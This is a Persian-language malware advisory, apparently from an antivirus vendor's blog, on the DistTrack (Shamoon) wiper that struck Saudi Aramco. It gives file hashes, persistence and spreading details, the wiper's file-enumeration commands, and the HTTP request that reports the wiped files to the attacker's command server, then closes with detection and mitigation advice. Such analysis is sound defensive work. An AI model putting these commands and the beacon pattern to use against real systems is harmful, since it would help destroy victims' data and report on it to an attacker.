مراقب ویروس DistTrack یا Shamoon باشید !

بدافزار

بدافزار DistTrack از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W32/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.

بدافزار DistTrack که اکنون توسط برخی شرکتهای ضدویروس Shamoon هم نامیده می شود، به احتمال قوی از طریق ایمیل و بصورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می گردد. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوء استفاده می کند.

با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.

برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور گردید و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.

 

بدافزار DistTrack از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W32/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.

 

نحوه انتشار اولیه این بدافزار هنوز مشخص نیست اما قابلیت انتشار از طریق Admin$ را دارا می باشد.

فایلهای اصلی مورد استفاده بدافزار DistTrack عبارتند از:

Filename : str.exe

Length : 989184 bytes

MD5 : B14299FD4D1CBFB4CC7486D978398214

SHA1 : 7C0DC6A8F4D2D762A07A523F19B7ACD2258F7ECC

Filename : str.exe

Length : 989,184 bytes

MD5 : D214C717A357FE3A455610B197C390AA

SHA1: 502920A97E01C2D022AC401601A311818F336542

This version does run however and results in the following files being dropped on the system.

Filename : netinit.exe

Length : 133120 bytes

MD5 : 41F13811FA2D4C41B8002BFB2554A286

SHA1 : C404CDC9F804B565D60B2ADB87C9A6B7AFB42B90

Filename : dfrag.exe

Length : 194048 bytes

MD5 : 3B740CCA401715985F3A0C28F851B60E

SHA1 : 5752898ABC85528D50739A1EDC8E6FEED0A3E1AD

Filename : drdisk.sys

Length : 27280 bytes

MD5 : 1493D342E7A36553C56B2ADEA150949E

SHA1 : CE549714A11BD43B52BE709581C6E144957136EC

ظاهراً فایلهای اجرایی این بدافزار در ۱۹ مرداد ایجاد شده اند.

با اجرا شدن فایل اجرایی اولیه، بدافزار یک کپی از خود را با نام tsksvr.exe در مسیر %SystemRoot%System32 قرار می دهد. در ادامه، این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می گردد.

بدافزار DistTrack

با شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:

caclsrv.exe, certutl.exe, clean.exe, ctrl.exe, dfrag.exe, dnslookup.exe, dvdquery.exe, event.exe, findfile.exe, gpget.exe, ipsecure.exe, iissrv.exe, msinit.exe, ntfrsutil.exe, ntdsutl.exe, power.exe, rdsadmin.exe, regsys.exe, sigver.exe, routeman.exe, rrasrv.exe, sacses.exe, sfmsc.exe, smbinit.exe, wcscript.exe, ntnw.exe, netx.exe, fsutl.exe, extract.exe,

همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار می باشد. این بخش فرامین زیر را اجرا می کند:

dir “C:Documents and Settings” /s /b /a:-D >nul | findstr -i download >nul >f1.inf

dir “C:Documents and Settings” /s /b /a:-D >nul | findstr -i document >nul >>f1.inf

dir C:Users /s /b /a:-D >nul | findstr -i download >nul >>f1.inf

dir C:Users /s /b /a:-D >nul | findstr -i document >nul >>f1.inf

dir C:Users /s /b /a:-D >nul | findstr -i picture >nul >>f1.inf

dir C:Users /s /b /a:-D >nul | findstr -i video >nul >>f1.inf

dir C:Users /s /b /a:-D >nul | findstr -i music >nul >>f1.inf

dir “C:Documents and Settings” /s /b /a:-D >nul | findstr -i desktop >nul >f2.inf

dir C:Users /s /b /a:-D >nul | findstr -i desktop >nul >>f2.inf

dir C:WindowsSystem32Drivers /s /b /a:-D >nul >>f2.inf

dir C:WindowsSystem32Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f2.inf

dir f1.inf /s /b >nul >>f1.inf

dir f2.inf /s /b >nul >>f1.inf

نتیجه اجرای این فرامین، تهیه فهرستی از نام و مسیر فایلهایی است که در شاخه های Desktop، Documents، Download، Video، Music، Pictures قرار دارند. این فهرست در دو فایل به نامهای f1.inf و f2.inf ذخیره می شوند. در ادامه، یک کپی از فهرست فایلها در فایل زیر ذخیره می شود:

C:WINDOWSinfnetfb318.pnf

سپس داده های این فایلها، با ۱۰۲۴ بایت اول یک فایل JPEG بطور مکرر جایگزین می شود. (تصویر زیر)

بدافزار DistTrack

در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می باشند.

همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می گردد که دیسک بعد از راه اندازی مجدد دستگاه توسط سیستم غیرقابل شناسایی شود.

در نهایت این بدافزار فهرستی از فایلهای رونویسی شده را از C:WINDOWSinfnetfb318.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:

GET /ajax_modal/modal/data.asp?mydata=_1CD&uid=172.xxx.xxx.xxx&state=9323859

HTTP/1.1

Connection: keep-alive

User-Agent: you

Host: 10.1.252.19

Pragma: no-cache

به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده توسط کارشناسان شرکت مهندسی شبکه گستر (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.

ضدویروس های McAfee و Bitdefender به ترتیب این بدافزار را با نام های W32/DistTrack و Gen:Trojan.Heur.8u0@IlmUdSm و با به روز رسانی های DAT 6805 و Update 7.42746 قادر به شناسایی و پاکسازی این ویروس می باشند.

About The Author

Related posts

Leave a Reply

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*